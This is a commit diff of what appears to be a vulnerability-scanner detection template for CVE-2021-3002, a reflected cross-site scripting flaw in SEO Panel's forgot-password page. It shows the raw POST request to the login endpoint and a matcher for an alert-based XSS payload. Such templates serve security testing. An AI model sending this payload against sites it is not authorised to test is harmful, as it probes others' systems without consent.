misc updates
parent
7032b928cc
commit
20774864c5
|
@ -12,12 +12,12 @@ info:
|
|||
cwe-id: CWE-79
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3002
|
||||
- http://www.cinquino.eu/SeoPanelReflect.htm
|
||||
tags: cve,cve2021,seopanel,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
- |
|
||||
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
@ -38,4 +38,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<img src=a onerror=alert(document.domain)>11"
|
||||
- "<img src=a onerror=alert(document.domain)>"
|
||||
- "seopanel"
|
||||
condition: and
|
Loading…
Reference in New Issue